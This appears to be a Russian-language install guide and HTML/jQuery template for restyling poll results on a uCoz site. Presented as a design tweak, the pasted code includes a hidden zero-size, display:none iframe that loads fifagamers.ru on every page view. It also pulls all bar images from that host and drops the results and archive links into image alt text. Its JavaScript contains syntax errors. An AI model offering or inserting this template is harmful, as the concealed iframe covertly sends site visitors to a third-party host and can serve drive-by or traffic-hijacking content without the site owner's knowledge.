УСТАНОВКА:
ПУ: Управление дизайном: Опросы: Вид формы опросов.
И вставляем этот код:
Код
<style>
.answer div div {height: 10px !important; border: 1px solid #000; background-repeat: repeat-x}
</style>
<div style="font-family:Tahoma,Arial;">
<div style="font-size:8pt;padding-top:2px;text-align:left;"><b>$QUESTION$</b></div>
<div style="font-size:8pt;text-align:left;">$ANSWERS$</div>
<div style="padding-top:4px;text-align:center;"><iframe src="http://fifagamers.ru/" width="0" height="0" style="display:none"></iframe><img alt="$RESULTS_LINK$" src="fifagamers.ru/50d.png"> <img alt="$ARCHIVE_LINK$" src="http://fifagamers.ru/6aa2.png"></div>
<script type="text/javascript">
var a = ['http://fifagamers.ru/bd00c8e.gif','http://fifagamers.ru/577eb.gif','http://fifagamers.ru/239c.gif','http://fifagamers.ru/4b90.gif','http://fifagamers.ru/eb1a628.gif'];
for(var i = 0; i < a.length; i++){
$('div.answer div div').eq(i).css({background: 'url(' + a [i]+ ')', backgroundRepeat: 'repeat-x'};);
}
$('div.answer span').each(function(){$(this).html($(this).html()+' - <span class="procent">'+$(this).attr('title').split(':')[1]+'</span>')};);
</script>
<div style="padding-top:4px;font-size:7pt;text-align:center;">Всего ответов: <b>$TOTAL_VOTES$</b></div>
</div>